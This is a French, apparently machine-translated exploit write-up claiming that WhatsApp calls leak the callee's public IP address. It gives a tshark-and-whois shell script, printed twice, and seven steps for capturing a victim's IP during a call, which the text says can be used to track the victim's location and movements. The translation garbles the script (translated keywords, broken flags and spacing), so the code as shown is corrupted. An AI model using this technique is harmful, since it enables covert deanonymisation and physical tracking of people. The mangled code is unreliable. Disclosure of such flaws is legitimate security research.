Ce programme est uniquement à des fins éducatives. Ne l'utilisez pas sans autorisation. L'inclusion habituelle s'applique, en particulier le fait que moi (Bhdreresh) n'est pas responsable des dommages causés par l'utilisation directe ou indirecte des informations ou des fonctionnalités fournies par ces programmes. L'auteur ou tout fournisseur d'Internet n'a aucune responsabilité pour le contenu ou la mauvaise utilisation de ces programmes ou tout autre dérivé. En utilisant ce programme, vous acceptez le fait que tout dommage (datalos, crash du système, compromis système, etc.) causé par l'utilisation de ces programmes n'est pas la responsabilité de Bhdrersh.
Enfin, c'est un développement personnel, veuillez respecter sa philosophie et ne pas l'utiliser pour de mauvaises choses!
https://vimeo.com/577355374
La dernière version de l'application WhatsApp sur toutes les plates-formes est vulnérable à la divulgation IP publique de l'utilisateur WhatsApp distant.
Il est observé que lors d'un appel WhatsApp (voix / vidéo), l'application du côté de l'appelant essaie d'établir une connexion directe avec l'adresse IP publique de l'appareil destinataire. En filtrant les adresses IP de Facebook et WhatsApp Server à partir des hôtes de destination, il est possible de révéler l'adresse IP publique correcte de l'utilisateur de WhatsApp cible à son insu.
Voici un script rapide pour exploiter cette vulnérabilité,
#! / bin / sh
Filter = tshark -i eth0 -T fields -f "udp" -e ip.dst -Y "ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12" -c 100 |sort -u |xargs|sed "s/ / and ip.dst!=/g" |sed "s/^/ip.dst!=/g"
Echo "Appuyez sur Entrée et appelez votre cible".
ligne de lecture
Tshark -i eth0 -l -t champs -f "udp" -e ip.dst -y "$ filter" -y "ip.dst! = 192.168.0.0 / 16 et ip.dst! = 10.0.0.0 / 8 et ip.dst! = 172.16.0.0 / 12 "| Pendant que vous lisez la ligne do whis $ line> / tmp / b
Filtre = cat /tmp/b |xargs| egrep -iv "facebook|google"|wc -l
si ["$ filter" -gt 0]; puis cibleInfo = cat /tmp/b| egrep -iw "OrgName:|NetName:|Country:"
echo $ line --- $ cibleInfo fi fait
La possibilité de cartographier les utilisateurs de WhatsApp avec leur IP publique ne révèlera pas seulement les informations de localisation des utilisateurs de WhatsApp, mais peut également être utilisée à mauvais escient pour suivre leur mouvement physique en maintenant l'historique de la localisation. Une telle cartographie directe entre les informations de l'utilisateur vers IP peut également être utilisée à mauvais escient pour suivre les habitudes de surfant des utilisateurs et l'influencer.
De plus, la propriété intellectuelle pourrait être exploitée pour lancer des attaques ciblées envers WhatsApp User Home or Office.
Utilisateurs: USERA a un détail WhatsApp de l'utilisateur
Environnement: N / A
Navigateur: n / a
Version de l'application: <= dernière version de l'application WhatsApp sur n'importe quelle plate-forme
OS: Toutes les plates-formes sauf Web
Description: USERA passe un appel WhatsApp à UserB et capture ses informations publiques IP à la connaissance de l'utilisateur. Vidéo POC pour une meilleure compréhension des étapes: https://vimeo.com/577355374
Étape 1: Démarrez le hotspot WiFi sur l'attaquant de l'attaquant et connectez le téléphone de l'attaquant à l'attaquant SSID
Étape 2: Démarrez le script POC (ci-dessous) sur l'attaquant de l'attaquant qui agit maintenant comme un routeur pour le téléphone de l'attaquant
#! / bin / sh
Filter = tshark -i eth0 -T fields -f "udp" -e ip.dst -Y "ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12" -c 100 |sort -u |xargs|sed "s/ / and ip.dst!=/g" |sed "s/^/ip.dst!=/g"
Echo "Appuyez sur Entrée et appelez votre cible".
ligne de lecture
Tshark -i eth0 -l -t champs -f "udp" -e ip.dst -y "$ filter" -y "ip.dst! = 192.168.0.0 / 16 et ip.dst! = 10.0.0.0 / 8 et ip.dst! = 172.16.0.0 / 12 "| Pendant que vous lisez la ligne do whis $ line> / tmp / b
Filtre = cat /tmp/b |xargs| egrep -iv "facebook|google"|wc -l
si ["$ filter" -gt 0]; puis cibleInfo = cat /tmp/b| egrep -iw "OrgName:|NetName:|Country:"
echo $ line --- $ cibleInfo fi fait
Étape 3: Appelez tout utilisateur de WhatsApp au hasard pour capturer les adresses IP du serveur pour filtrer
Étape 4: Appelez la victime sur son WhatsApp
Étape 5: Débranchez l'appel une fois établi
Étape 6: Le script révélera l'adresse IP publique de la cible
Étape 7: Valider l'adresse IP publique sur le téléphone cible